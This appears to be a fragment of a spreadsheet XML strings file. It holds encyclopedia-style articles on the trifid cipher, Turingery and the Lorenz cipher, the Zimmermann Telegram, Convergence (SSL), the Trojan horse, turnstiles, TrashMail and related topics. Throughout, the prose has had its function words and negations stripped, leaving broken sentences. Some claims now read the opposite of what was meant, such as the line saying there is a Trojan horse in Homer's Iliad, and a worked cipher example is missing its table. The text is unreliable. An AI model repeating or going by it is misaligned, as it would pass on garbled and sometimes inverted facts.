    <t>trifid cipher classical cipher invented félix delastelle described 1902. extending principles delastelle's earlier bifid cipher, combines techniques fractionation transposition achieve certain amount confusion diffusion: letter ciphertext depends three letters plaintext three letters key. trifid cipher uses table fractionate plaintext letter trigram, mixes constituents trigrams, applies table reverse turn mixed trigrams ciphertext letters. delastelle notes practical system uses three symbols trigrams:in order split letters three parts, necessary represent group three signs numbers. knowing objects, combined trigrams possible ways, give recognize three value would give trigrams, four would give three give description discussed above, cipher requires 27-letter mixed alphabet: follow delastelle using plus sign 27th letter. traditional method constructing mixed alphabet word phrase write unique letters order, followed remaining letters alphabet usual order. example, felix marie delastelle yields mixed alphabet felixmardstbcghjknopquvwyz+. letter mixed alphabet assign trigrams (111, 112, 333) populating cube letters mixed alphabet, using cartesian coordinates letter corresponding trigram. from cube build tables enciphering letters trigrams deciphering trigrams letters: encryption protocol divides plaintext groups fixed size (plus possibly short group end): confines encoding errors group occur, important consideration ciphers must implemented hand. group size coprime maximum amount diffusion within group: delastelle gives examples groups letters. describes encryption step follows:we start writing vertically letter, numerical trigram corresponds enciphering alphabet: proceeding horizontally numbers written single line, take groups three numbers, look deciphering alphabet, write result column. example, message aide-toi, ciel t'aidera, group size encryption proceeds follows: table periods delimit trigrams read horizontally group, thus first group notes references delastelle, félix (1902). traité élémentaire cryptographie. paris: gauthier-villars. gaines, helen (1939). cryptanalysis: study ciphers their solution. york: dover.</t>
  </si>
  <si>
    <t>ARMM (Usenet)</t>
  </si>
  <si>
    <t>automated retroactive minimal moderation (armm) program developed richard depew 1993 control usenet abuse. concerned abusive posts emanating certain anonymous-posting sites, depew developed armm allow news administrators automatically issue cancel messages posts. this controversial act, many news administrators users concerned censorship netnews medium. early version armm contained caused post follow-ups messages, recursively sending posts news.admin.policy newsgroup. this early example (unintentional) usenet spam. references</t>
  </si>
  <si>
    <t>Cooperative database</t>
  </si>
  <si>
    <t>cooperative database type database holds information customers transaction histories. many companies contribute information database return aggregate information customers companies provided. such databases used promotional mailings, credit card fraud detection, digital media targeting, business intelligence, fighting e-mail spam. alternatively, term "cooperative database" used describe database systems incorporate techniques users beyond returning direct answers. such databases can, example, give explanations query returns results, detect report user misconception suggested query, provide justifications returned answers, relax query attributes find "close" non-precise answers. fundamental goal extend databases towards reflecting cooperative principle, particular, avoid misleading users omission pertinent, contextual detail. references</t>
  </si>
  <si>
    <t>Turingery</t>
  </si>
  <si>
    <t>turingery turing's method (playfully dubbed turingismus peter ericsson, peter hilton donald michie) manual codebreaking method devised july 1942 mathematician cryptanalyst alan turing british government code cypher school bletchley park world cryptanalysis lorenz cipher produced sz40 sz42 teleprinter rotor stream cipher machines, germans' geheimschreiber (secret writer) machines. british codenamed non-morse traffic "fish", machine "tunny" (another word tuna fish). reading tunny message required firstly logical structure system known, secondly periodically changed pattern active cams wheels derived, thirdly starting positions scrambler wheels message—the message key—was established. logical structure tunny worked william tutte colleagues several months ending january 1942. deriving message called "setting" bletchley park, derivation patterns—which known "wheel breaking"—that target turingery. german operator errors transmitting message key, producing "depth", allowed derivation key. turingery applied stream derive settings. sz40 sz42 logical functioning tunny system worked well bletchley park cryptanalysts machines—which happened 1945, shortly allied victory europe. machines 12-wheel rotor cipher machines implemented vernam stream cipher. they attached in-line standard lorenz teleprinters. message characters encoded 5-bit international telegraphy alphabet (ita2). output ciphertext characters generated combining pseudorandom character-by-character stream input characters using "exclusive (xor) function, symbolised {\displaystyle \oplus mathematical notation. relationship plaintext, ciphertext cryptographic then: {\displaystyle \mathrm {ciphertext} =\mathrm {plaintext} \oplus \mathrm {key} similarly, deciphering, ciphertext combined give plaintext: {\displaystyle \mathrm {plaintext} =\mathrm {ciphertext} \oplus \mathrm {key} this produces essential reciprocity allow machine settings used enciphering deciphering. each five bits character generated relevant wheels parts machine. these termed {\displaystyle \chi wheels, {\displaystyle \psi wheels. wheels moved position character. wheels also moved together, character. their movement controlled {\displaystyle "motor" wheels.the stream generated machines thus component component combined function. combined plaintext enciphering—or ciphertext deciphering—can represented follows. {\displaystyle \mathrm {key} ={\textit {chi}}\mathrm {{\mbox{-}}key} \oplus {\textit {psi}}\mathrm {{\mbox{-}}key} symbolically: {\displaystyle k=\chi \oplus \psi twelve wheels series cams "pins") around them. these cams could raised lowered position. raised position generated "mark" ("1" binary), lowered position generated "space" ("0" binary). number cams wheel equalled number impulses needed cause complete full rotation. these numbers co-prime other, giving longest possible time pattern repeated. with total cams equals 2501 approximately 10151, astronomically large number. however, five impulses considered independently, numbers much manageable. product rotation period pair wheels gives numbers 41×31=1271 26×23=598. differencing cryptanalysis often involves finding patterns sort provide eliminating range possibilities. bletchley park combination values adjacent letters ciphertext called difference (symbolised greek letter delta {\displaystyle \delta modulo subtraction (without "borrow")—and, incidentally, modulo addition (without "carry"). characters (k), difference {\displaystyle \delta obtained follows, underline indicates succeeding character: {\displaystyle \delta k=k\oplus {\underline {k}}} (similarly plaintext, ciphertext, components key). relationship amongst applies differenced. example, well {\displaystyle k=\chi \oplus \psi case that: {\displaystyle \delta k=\delta \chi \oplus \delta \psi plaintext represented cipertext following also hold true: {\displaystyle \delta z=\delta p\oplus \delta \chi \oplus \delta \psi and: {\displaystyle \delta p=\delta z\oplus \delta \chi \oplus \delta \psi reason differencing provided tunny that, although frequency distribution characters ciphertext could distinguished random stream, true version ciphertext element removed. this because, plaintext contained repeated character wheels move differenced character {\displaystyle \delta \psi would null character ("·····" 00000), bletchley park terminology, "/". when xor-ed character, null character effect, circumstances, {\displaystyle \delta \chi =\delta repeated characters plaintext frequent, characteristics german (ee, relatively common), telegraphists frequently repeated figures-shift letters-shift characters loss ordinary telegraph message could lead gibberish. quote general report tunny:turingery introduced principle differenced one, called {\displaystyle \delta could yield information unobtainable ordinary key. this {\displaystyle \delta principle fundamental basis nearly statistical methods wheel-breaking setting. bit-level differencing well applying differencing full 5-bit characters ita2 code, also applied individual impulses (bits). first impulse, enciphered wheels {\displaystyle \chi _{1}} {\displaystyle \psi _{1}} differenced one: {\displaystyle \delta k_{1}=k_{1}\oplus {\underline {k_{1}}}} second impulse: {\displaystyle \delta k_{2}=k_{2}\oplus {\underline {k_{2}}}} also worth noting periodicity wheels impulse respectively first one) reflected pattern {\displaystyle \delta however, given wheels advance every input character, wheels, simply repetition pattern every 1763 characters {\displaystyle \delta k_{1}} complex sequence. turing's method july 1942 turing spent weeks research section. become interested problem breaking tunny keys obtained depths. july, developed method deriving settings length key. involved iterative, almost trial-and-error, process. relied fact differenced character null character ("·····" 00000), xor-ing character change thus delta character gives character five wheels (i.e. {\displaystyle \delta \chi =\delta given delta character null character half time average, assumption {\displaystyle \delta k=\delta \chi chance correct. process started treating particular {\displaystyle \delta character {\displaystyle \chi position. resulting putative pattern wheel, recorded sheet paper contained many columns characters key, five rows representing five impulses {\displaystyle \delta \chi given knowledge tutte's work, periodicity wheels, allowed propagation values appropriate positions rest key. five sheets, wheels, also prepared. these contained columns corresponding number cams appropriate wheel, referred 'cage'. {\displaystyle \chi _{3}} cage columns. successive 'guesses' {\displaystyle \delta \chi values produced putative state values. these might either agree disagree previous assumptions, count agreements disagreements made sheets. where disagreements substantially outweighed agreements, assumption made {\displaystyle \delta \psi character null character "/", relevant assumption discounted. progressively, settings wheels deduced, motor wheel settings. experience method developed, improvements made allowed used much shorter lengths original characters. also banburismus differential cryptanalysis references notes bibliography carter, frank, bletchley park technical papers: colossus breaking lorenz cipher (pdf), retrieved january 2011 churchhouse, robert (2002), codes ciphers: julius caesar, enigma internet, cambridge: cambridge university press, isbn 978-0-521-00890-7 copeland, jack (2006), "turingery", copeland, jack (ed.), colossus: secrets bletchley park's codebreaking computers, oxford: oxford university press, isbn 978-0-19-284055-4 good, jack (1993), "enigma fish", hinsley, f.h.; stripp, alan (eds.), codebreakers: inside story bletchley park, oxford: oxford university press, isbn 978-0-19-280132-6 good, jack; michie, donald; timms, geoffrey (1945), general report tunny: with emphasis statistical methods, public record office 25/4 25/5, retrieved september 2010 that version facsimile copy, transcript much document '.pdf' format sale, tony (2001), part "general report tunny", newmanry history, formatted tony sale (pdf), retrieved september 2010, transcript part ellsbury, graham, general report tunny with emphasis statistical methods, retrieved november 2010 government code cypher school (1944), bletchley park 1944 cryptographic dictionary formatted tony sale (pdf), retrieved october 2010 hodges, andrew (1992), alan turing: enigma, london: vintage, isbn 978-0-09-911641-7 newman, 1944), "appendix {\displaystyle \chi -method", copeland, jack (ed.), colossus: secrets bletchley park's codebreaking computers, oxford: oxford university press, isbn 978-0-19-284055-4 tutte, william (2006), work bletchley park", copeland, jack (ed.), colossus: secrets bletchley park's codebreaking computers, oxford: oxford university press, isbn 978-0-19-284055-4 tutte, june 1998), fish (pdf), archived original (pdf) july 2007, retrieved october 2010 transcript lecture given prof. tutte university waterloo</t>
  </si>
  <si>
    <t>Convergence (SSL)</t>
  </si>
  <si>
    <t>convergence proposed strategy replacing certificate authorities, first forth moxie marlinspike august 2011 giving talk titled "ssl future authenticity" black security conference. demonstrated firefox addon server-side notary daemon. talk, marlinspike proposed current problems certificate authority (ca) system could reduced single missing property, called "trust agility" convergence aimed provide. strategy claimed agile, secure, distributed.as 2013, marlinspike focused ietf proposal called tack, designed uncontroversial first step advocates dynamic certificate pinning instead full replacement reduces number times third party needs trusted.development convergence continued "convergence extra" fork 2014. background convergence based previous work perspectives project carnegie mellon university. like perspectives, convergence authenticated connections contacting external notaries, unlike perspectives, convergence notaries could number different strategies beyond network perspective order reach verdict. convergence comparison conventional purpose certificate authority conventional system vouch identity site, checking certificate. without vouchsafing, open man-in-the-middle attack. single site vouched single certificate authority (ca), trusted user. browsers typically include list default trusted display warning "untrusted connection" site cannot vouchsafed trusted problem system user browser vendor) loses trust removing browser's list trusted authorities means losing trust sites used this happened major browsers lost trust diginotar sites registered certificate authorities (see certificate authority#ca compromise examples trust breaches). with convergence, however, level redundancy, single point failure. several notaries could vouch single site. user could choose trust several notaries, would vouch sites. notaries disagreed whether site's identity correct, user could choose majority vote, side caution demand notaries agree, content single notary (the voting method controlled setting browser addon). user chose distrust certain notary, non-malicious site could still trusted long remaining trusted notaries trusted thus longer single point failure. september 2011, qualys announced would notary servers. june, 2016 servers appeared down. list notaries maintained convergence wiki. alternatives monkeysphere project tries solve problem using trust model assess authenticity https certificates. http public pinning security mechanism allows https websites resist impersonation attackers using mis-issued otherwise fraudulent certificates.certificate transparency attempt solve problem verifiable append-only public logs. references external links "convergence". archived original august 2016. retrieved october 2011.{{cite web}}: maint: bot: original status unknown (link) convergence project page github</t>
  </si>
  <si>
    <t>Trojan horse</t>
  </si>
  <si>
    <t>trojan horse refers wooden horse said used greeks, trojan war, enter city troy war. there trojan horse homer's iliad, poem ending concluded, briefly mentioned odyssey. aeneid virgil, fruitless 10-year siege, greeks behest odysseus constructed huge wooden horse select force inside, including odysseus himself. greeks pretended sail away, trojans pulled horse city victory trophy. that night greek force crept horse opened gates rest greek army, sailed back cover night. greeks entered destroyed city troy, ending war. metaphorically, "trojan horse" come mean trick stratagem causes target invite securely protected bastion place. malicious computer program tricks users willingly running also called "trojan horse" simply "trojan". main ancient source story still extant aeneid virgil, latin epic poem time augustus. story featured heavily little iliad sack troy, part epic cycle, survived fragments epitomes. odysseus chief architect trojan horse, also referred homer's odyssey. greek tradition, horse called "wooden horse" (δουράτεος ἵππος douráteos híppos homeric/ionic greek (odyssey 8.512); δούρειος ἵππος, doúreios híppos attic greek). horse thirty achaeans' best warriors trojan horse's womb spies mouth. other sources give different numbers: bibliotheca tzetzes quintus smyrnaeus gives names says more. late tradition number standardized their names follow: literary accounts according quintus smyrnaeus, odysseus thought building great wooden horse (the horse emblem troy), hiding elite force inside, fooling trojans wheeling horse city trophy. under leadership epeius, greeks built wooden horse three days. odysseus's plan called remain outside horse; would though greeks abandoned him, leaving horse gift trojans. inscription engraved horse reading: "for return home, greeks dedicate offering athena". then burned tents left tenedos night. greek soldier sinon "abandoned" signal greeks lighting beacon.in virgil's poem, sinon, volunteer role, successfully convinces trojans left behind greeks gone. sinon tells trojans horse offering goddess athena, meant atone previous desecration temple troy greeks ensure safe journey home greek fleet. sinon tells trojans horse built large take city gain favor athena themselves. while questioning sinon, trojan priest laocoön guesses plot warns trojans, virgil's famous line timeo danaos dona ferentes fear greeks, even bearing gifts"), danai (acc danaos) danaans (homer's name greeks) ones built trojan horse. however, poseidon sends serpents strangle sons antiphantes thymbraeus trojan heeds warning. according apollodorus serpents sent apollo, laocoön insulted sleeping wife front "divine image". odyssey, homer says helen troy also guesses plot tries trick uncover greek soldiers inside horse imitating voices wives, anticlus attempts answer, odysseus shuts mouth hand. king priam's daughter cassandra, soothsayer troy, insists horse downfall city royal family. ignored, hence doom loss war.this incident mentioned odyssey: detailed familiar version virgil's aeneid, book (trans. kline). book includes laocoön saying: "equo credite, teucri. quidquid est, timeo danaos dona ferentes." ("do trust horse, trojans! whatever fear danaans [greeks], even bearing gifts.") well virgil, story also alluded greek classical literature. euripides' play trojan women, written poseidon proclaims: "for, home beneath parnassus, phocian epeus, aided craft pallas, framed horse bear within womb armed host, sent within battlements, fraught death; whence days come shall tell 'the wooden horse,' hidden load warriors." factual explanations there speculation trojan horse battering sort siege engine resembling, extent, horse, description device transformed myth later oral historians present battle unaware meaning name. assyrians used siege machines animal names often covered dampened horse hides protect flaming arrows; possible trojan horse such. pausanias, lived century wrote book description greece, "that work epeius contrivance make breach trojan wall known everybody attribute utter silliness phrygians"; phrygians, meant trojans. some authors suggested gift might also ship, warriors hidden inside. noted terms used horse used ancient greek authors describe embarkation ship analogies building ships paris beginning trojan saga building horse end; ships called "sea-horses" odyssey. this view recently gained support naval archaeology: ancient text images show phoenician merchant ship type decorated horse head, called hippos ('horse') greeks, became diffuse levant area around beginning millennium used trade precious metals sometimes tribute war. that caused suggestion original story viewed greek soldiers hiding inside hull vessel, possibly disguised tribute, term later misunderstood oral transmission story, origin trojan horse myth. ships horsehead decoration, perhaps cult ships, also represented artifacts minoan/mycenaean era; image seal found palace knossos, dated around 1200 depicts ship oarsmen superimposed horse figure, originally interpreted representation horse transport sea, fact related kind vessels, even considered first (pre-literary) representation trojan horse episode.a speculative theory, originally proposed fritz schachermeyr, states trojan horse metaphor destructive earthquake damaged walls troy allowed greeks inside. theory, horse represents poseidon, well also horses earthquakes. theory supported fact archaeological digs found troy heavily damaged earthquake hard square mythological claim poseidon built walls troy first place. modern metaphorical term "trojan horse" used metaphorically mean trick strategy causes target invite securely protected place; deceive appearance, hiding malevolent intent outwardly benign exterior; subvert within using deceptive means. artistic representations pictorial representations trojan horse earlier than, contemporary first literary appearances episode help clarify meaning story perceived contemporary audience. there ancient (before depictions trojan horse surviving. earliest boeotian fibula dating other early depictions found relief pithoi greek islands mykonos tinos, generally dated mykonos (see figure) known mykonos vase. historian michael wood dates mykonos vase eighth century written accounts attributed tradition homer, posits evidence story trojan horse existed accounts written. other archaic representations trojan horse found corinthian aryballos dating back (see figure), vase fragment (see figure), etruscan carnelian scarab. citations external links "earthquakes toppled ancient cities": "don't blame trojan horse: earthquakes toppled ancient cities, stanford geophysicist says"</t>
  </si>
  <si>
    <t>Zimmermann Telegram</t>
  </si>
  <si>
    <t>zimmermann telegram zimmermann note zimmerman cable) secret diplomatic communication issued german foreign office january 1917 proposed military alliance germany mexico united states entered world germany. mexico would recover texas, arizona, mexico. telegram intercepted decoded british intelligence. revelation contents enraged americans, especially german foreign secretary arthur zimmermann publicly admitted march telegram genuine. helped generate support american declaration germany april.the decryption described significant intelligence triumph britain world earliest occasions piece signal intelligence influenced world events. content message came form coded telegram dispatched arthur zimmermann, staatssekretär top-level civil servant) foreign office german empire january 1917. message sent german ambassador mexico, heinrich eckardt. zimmermann sent telegram anticipation resumption unrestricted submarine warfare germany february german government presumed would almost certainly lead united states. telegram instructed eckardt united states appeared certain enter war, approach mexican government proposal military alliance funding germany. decoded telegram follows: intend begin first february unrestricted submarine warfare. shall endeavor spite keep united states america neutral. event succeeding, make mexico proposal alliance following basis: make together, make peace together, generous financial support understanding part mexico reconquer lost territory texas, mexico, arizona. settlement detail left you. inform president secretly soon outbreak united states america certain, suggestion should, initiative, invite japan immediate adherence time mediate japan ourselves. please call president's attention fact ruthless employment submarines offers prospect compelling england months make peace.signed, zimmermann history previous german efforts promote germany long sought incite mexico united states, would tied american forces slowed export american arms allies. germans aided arming mexico, shown 1914 ypiranga incident. german naval intelligence officer franz rintelen attempted incite mexico united states 1915, giving victoriano huerta million purpose. german saboteur lothar witzke, based mexico city, claimed responsible march 1917 munitions explosion mare island naval shipyard francisco area, possibly responsible july 1916 black explosion jersey. failure united states troops capture pancho villa 1916 movement president carranza favor germany emboldened germans send zimmermann note.the german provocations partially successful. president woodrow wilson ordered military invasion veracruz 1914 context ypiranga incident advice british government. prevented thanks niagara falls peace conference organized nations, occupation decisive factor mexican neutrality world mexico refused participate embargo germany granted full guarantees german companies keeping operations open, specifically mexico city. these guarantees lasted years; coincidentally, 1942, mexico declared axis powers loss mexican-flagged tankers month kriegsmarine u-boats. german motivations zimmerman telegram part effort carried germans postpone transportation supplies materials united states allies, germany. main purpose telegram make mexican government declare united states hopes tying american forces slowing export american arms. german high command believed could defeat british french western front strangle britain unrestricted submarine warfare american forces could trained shipped europe sufficient numbers allies. germans encouraged successes eastern front believe could divert large numbers troops western front support goals. mexican response mexican president venustiano carranza assigned military commission assess feasibility mexican takeover former territories contemplated germany. generals concluded would possible even desirable attempt enterprise following reasons: mexico midst civil war, carranza's position secure. declaration regime would provided opportunity opposing factions align united states allies exchange diplomatic recognition. united states stronger militarily mexico was. even mexico's military forces completely united loyal single regime, serious scenario existed could invaded united states. german government's promises "generous financial support" unreliable. already informed carranza june 1916 could provide necessary gold needed stock completely-independent mexican national bank. even mexico received financial support, would still need purchase arms, ammunition, needed supplies nations (argentina, brazil, chile), would strain relations them, explained below. even chance mexico military means conflict united states reclaim territories question, would severe difficulty conquering pacifying large english-speaking population long enjoyed self-government better supplied arms civilian populations. other foreign relations stake. nations organized niagara falls peace conference 1914 avoid full-scale united states mexico united states occupation veracruz. mexico entering united states would strain relations nations.the carranza government recognized jure united states august 1917, direct consequence zimmermann telegram ensure mexican neutrality world after military invasion veracruz 1914, mexico participate military excursion united states world that ensured mexican neutrality best outcome united states could hope even allowed german companies keep operations mexico open. british interception zimmermann's office sent telegram german embassy united states retransmission eckardt mexico. traditionally understood telegram sent three routes. went radio, passed telegraph cable inside messages sent diplomats neutral countries (the united states sweden). direct telegraph transmission telegram impossible british german international cables outbreak war. however, germany could communicate wirelessly telefunken plant, operating atlantic communication company west sayville, york, telegram relayed mexican consulate. ironically, station control navy, operated atlantic communication company, american subsidiary german entity. also, united states allowed limited diplomatic cables germany communicate ambassador washington. this privilege supposed used messages connected wilson's peace proposals. swedish diplomatic message holding zimmerman telegram went stockholm buenos aires british submarine telegraph cables, moved buenos aires mexico cable network united states company. traffic passing british hands came british intelligence, particularly codebreakers analysts room admiralty.after germans' telegraph cables cut, german foreign office appealed united states diplomatic telegraphic messages peace messages. president wilson agreed belief co-operation would sustain continued good relations germany efficient german-american diplomacy could assist wilson's goal negotiated war. germans handed messages american embassy berlin, relayed embassy denmark united states american telegraph operators. united states placed conditions german usage, notably messages cleartext (uncoded). however, wilson later reversed order relaxed wireless rules allow coded messages sent. germans assumed route secure used extensively.however, german diplomats precarious situation since relied united states transmit zimmermann's note final destination, message's unencrypted contents would deeply alarming americans. germans persuaded ambassador james gerard accept coded form, transmitted january 1917.in room nigel grey partially decoded telegram next day. 1917, diplomatic code 13040 many years. since ample time room reconstruct code cryptanalytically, readable fair degree. room obtained german cryptographic documents, including diplomatic code 3512 (captured mesopotamian campaign), later updated code similar really related code 13040, naval code (signalbuch kaiserlichen marine), ⁠which useless decoding zimmermann telegram valuable decode naval traffic, retrieved wrecked cruiser magdeburg russians, passed british.disclosure telegram would sway american public opinion germany british could convince americans text genuine, room chief william reginald hall reluctant disclosure would expose german codes broken room british eavesdropping united states diplomatic traffic. hall waited three weeks grey cryptographer william montgomery completed decryption. february germany announced resumption "unrestricted" submarine warfare, united states break diplomatic relations germany february hall passed telegram british foreign office february still warned releasing meanwhile, british discussed possible cover stories explain americans obtained coded text telegram explain obtained cleartext telegram without letting anyone know codes broken. furthermore, british needed find convince americans message forgery.for first story, british obtained coded text telegram mexican commercial telegraph office. british knew since german embassy washington would relay message commercial telegraph, mexican telegraph office would coded text. "mr. british agent mexico, bribed employee commercial telegraph company copy message. thomas hohler, british ambassador mexico, later claimed "mr. least involved interception autobiography. coded text could shown americans without embarrassment. moreover, retransmission encoded older code 13040 mid-february, british complete text ability release telegram without revealing extent latest german codes broken. worst, germans might realized 13040 code compromised, risk worth taking possibility united states entry war.) finally, since copies 13040 code text would also deposited records american commercial telegraph company, british ability prove authenticity message american government.as cover story, british could publicly claim agents stolen telegram's decoded text mexico. privately, british needed give americans 13040 code american government could verify authenticity message independently commercial telegraphic records, americans agreed back official cover story. german foreign office refused consider codes could broken sent eckardt witch hunt traitor embassy mexico. eckardt indignantly rejected accusations, foreign office eventually declared embassy exonerated. february hall showed telegram edward bell, secretary american embassy britain. bell first incredulous thought forgery. once bell convinced message genuine, became enraged. february hall informally sent copy ambassador walter hines page. february page british foreign minister arthur balfour given codetext, message german, english translation. british obtained copy mexico city, balfour could obscure real source half-truth "bought mexico". page reported story wilson february 1917, including details verified telegraph-company files united states. wilson felt "much indignation" toward germans wanted publish zimmermann telegraph immediately received british, delayed march 1917. u.s. response many americans held anti-mexican well anti-german views. mexicans considerable amount anti-american sentiment return, caused american occupation veracruz. general john pershing long chasing revolutionary pancho villa raiding american territory carried several cross-border expeditions. news telegram inflamed tensions united states mexico. however, many americans, particularly german irish ancestry, wished avoid conflict europe. since public told falsely telegram stolen decoded form mexico, message first widely believed elaborate forgery created british intelligence. that belief, restricted pacifist pro-german lobbies, promoted german mexican diplomats alongside antiwar american newspapers, especially hearst press empire. wilson administration thus presented dilemma. with evidence united states provided confidentially british, wilson realized message genuine, could make evidence public without compromising british codebreaking operation. doubts authenticity telegram removed zimmermann himself. press conference march 1917, told american journalist, cannot deny true." then, march 1917, zimmermann gave speech reichstag admitted telegram genuine. zimmermann hoped americans would understand idea germany would fund mexico's united states unless americans joined world february 1917, germany began unrestricted submarine warfare ships atlantic bearing american flag, passenger merchant ships. ships sunk february, american shipping companies held ships port. besides highly-provocative proposal mexico, telegram also mentioned "ruthless employment submarines". public opinion demanded action. wilson refused assign navy crews guns merchant ships, zimmermann note public, wilson called arming merchant ships although antiwar members senate blocked proposal.on april 1917, congress voted declare germany. wilson asked congress wars" would "make world safe democracy".wilson considered another military invasion veracruz tampico 1917–1918, pacify isthmus tehuantepec tampico fields ensure continued production civil war, time, mexican president venustiano carranza, recently installed, threatened destroy fields marines landed there. japanese response japanese government, another nation mentioned zimmerman telegram, already involved world side allies germany. government later released statement japan interested changing sides attacking america. autograph discovery october 2005, reported original typescript decoded zimmermann telegram recently discovered unnamed historian researching preparing official history united kingdom's government communications headquarters (gchq). document believed actual telegram shown american ambassador london 1917. marked admiral hall's handwriting document words: "this handed page exposed president." since many secret documents incident destroyed, previously assumed original typed "decrypt" gone forever. however, discovery document, gchq official historian said: believe indeed document balfour handed page." also american entry world imperial german plans invasion united states mexico world zinoviev letter references sources further reading external links works related zimmermann telegram wikisource media related zimmermann telegram wikimedia commons failed diplomacy: zimmermann telegram documents zimmermann telegram (1917) germannavalwarfare.info, some original documents british admiralty, room regarding zimmermann-/mexico telegram: photocopies national archives, kew, richmond, moving german embassy breaking relations, 1917 zimmermann telegram: original document, accessed 2015</t>
  </si>
  <si>
    <t>Cryptochannel</t>
  </si>
  <si>
    <t>telecommunication, cryptochannel complete system crypto-communications holders. includes: cryptographic aids prescribed; holders thereof; indicators means identification; area areas effective; special purpose, any, provided; pertinent notes distribution, usage, etc. cryptochannel analogous radio circuit. also cryptosystem secure channel references this article incorporates public domain material general services administration document: "federal standard 1037c". this article incorporates public domain material united states department defense document: "dictionary military associated terms".</t>
  </si>
  <si>
    <t>Turnstile</t>
  </si>
  <si>
    <t>turnstile (also called turnpike, gateline, baffle gate, automated gate, turn gate regions) form gate allows person pass time. turnstile configured enforce one-way human traffic. addition, turnstile restrict passage people insert coin, ticket, pass, method payment. modern turnstiles incorporate biometrics, including retina scanning, fingerprints, individual human characteristics scanned. thus turnstile used case paid access (sometimes called faregate ticket barrier used purpose), example access public transport, toilet, restrict access authorized people, example lobby office building. history turnstiles originally used, like forms stile, allow human beings pass keeping sheep livestock penned turnstiles modern applications credited clarence saunders, used first piggly wiggly store. applications turnstiles used wide variety settings, including stadiums, amusement parks, mass transit stations, office lobbies, airports, resorts, factories, power plants casinos. from business/revenue standpoint, turnstiles give accurate, verifiable count attendance. from security standpoint, lead patrons enter single-file, security personnel clear view patron. this enables security efficiently isolate potential trouble confiscate prohibited materials. hand, physical barriers become serious safety issue speedy evacuation needed, requiring emergency exits bypass turnstiles. persons disabilities difficulties using turnstiles. cases, generally wide aisle gate manual gate provided. locations luggage expected, line turnstiles entirely formed wide aisle gates, example heathrow terminals underground station. turnstiles often ratchet mechanisms allow rotation stile direction allowing ingress preventing rotation direction. they often designed operate payment made, usually inserting coin token slot; swiping, tapping, inserting paper ticket electronically-encoded card. turnstiles often used counting numbers people passing gate, even payment involved. they used extensively manner amusement parks, order keep track many people enter exit park ride ride. first major turnstiles sporting venue hampden park glasgow, scotland. usage russia public transport systems soviet union, common turnstiles entrance subway stations (first introduced moscow metro november 1958). city buses commuter trains usually operated proof-of-payment system, fare collection became pressing business post-soviet russia, railway terminals high-traffic railway station moscow area, nizhny novgorod elsewhere turnstiles installed.in early 2000s, moscow authorities sought improve fare collection; since enclosing tram stops providing fare gates feasible, installed turnstiles inside city tram. this practice caused passenger complaints, slowed boarding compared traditional honor system. similar system brazilian chilean city buses, hong kong trams. types waist-high waist-high turnstiles often used fairs, attractions, arenas. user inserts ticket pass slot, barcode read; access granted, sensor determines speed user passes through, sets electric motor turn turnstile corresponding speed. sometimes also referred "half-height" turnstiles, fixed style traditionally popular type turnstile. there many variations style available, including designed accompanied matching ticket box, ticket built some styles designed allow entry payment (actual coins tokens) inserted, others allow access valid barcode electronically read. disadvantage type people "jump turnstile" happens commonly moscow metro mass transport systems russia. wall mount tripod turnstile wall mount tripod turnstiles suitable places installation ground becomes impossible. turnstile directly fixed wall functions achieved. such turnstiles usually used narrow lanes wall installation feasible. optical optical turnstiles alternative traditional "arm"-style turnstile increasingly used locations physical barrier deemed unnecessary unaesthetic. optical turnstiles generally infrared beam count patrons recognize anyone attempting enter site without valid entry pass. drop optical drop optical turnstile combination security tripod barrier turnstile fully optical turnstile. lanes either single double arms. when access granted arms drop recesses cabinet. once arms drop way, turnstile functions fully optical turnstile. full-height turnstiles full-height turnstile larger version waist-high turnstile, commonly 7-foot (2.1 high, similar operation revolving door. full-height turnstile eliminates possibility (inherent waist-high style) someone jumping turnstile extended height. full height turnstile design also eliminates possibility someone crawling turnstile floor-to-ceiling height turnstiles maximum perimeter security design, making great choice high security applications control unauthorized entry egress. this type turnstile functions differently revolving door often allow someone come someone else goes out. beyond this, full-height turnstiles often allow access person time locking single person makes entry. also pejoratively known "iron maiden", torture device name, "high-wheel". sometimes called "rotogate", especially chicago, used unstaffed exits chicago stations, also used increasingly york city subway stations since turn 21st century. europe, however, "rotogate" refers different kind gate turnstile. there types full height turnstiles, high entrance/exit turnstile (heet) exit-only. difference heet turnstiles rotate directions thus allowing two-way traffic, exit-only turnstiles rotate direction thus allowing one-way traffic. exit-only turnstiles commonly used mass transit stations allow passengers exit system without interfering entering. exit-only models also used enclosed areas theme parks, zoos, amusement parks, allow visitors leave, denying admission paid. additionally single, double tandem turnstiles contain rotors side side frame. this allows throughput limited space, tandems frequently narrow single turnstiles placed side side. recent trends indicate preference turnkey, installed, turnstiles, especially aftermath 2020 pandemic lead shortage installation workers. also optical turnstile stile revolving door toll road turnstile (symbol) notes references external links page showing various designs turnstiles history york subway system.</t>
  </si>
  <si>
    <t>TrashMail</t>
  </si>
  <si>
    <t>trashmail free disposable e-mail address service created 2002 stephan ferraro, computer science student epitech paris belongs ferraro ltd. service provides temporary email addresses abandoned start receiving email spam. mainly forwards emails real hidden email address. description trashmail receives emails forwards real hidden email address. account creation option number total forwards date disposable email expires. forwarded email counter decreased when counter reaches date limit expired temporary email address deleted. after temporary email address deleted, incoming email rejected smtp code 5.1.1. trashmail also provides free open-source add-on mozilla firefox available official store. email registration community forum provided https (ssl http) access protect privacy. additionally smtp server communication enabled default. many spammers rely harvested email addresses, best method avoiding spam publish one's real email address. providing temporary address, trashmail allows users protect real email. extras trashmail differs disposable email address services possibility challenge-response system free disposable email address. additionally, provides real-time spam stats main page. possible verify current incoming spam amount site. software trashmail used homepage www.trashmail.net. however provided documented forum explains write custom software free service. mozilla firefox add-on service available. references external links official website mozilla firefox add-on</t>
  </si>
  <si>
    <t>Turtle F2F</t>
  </si>
  <si>
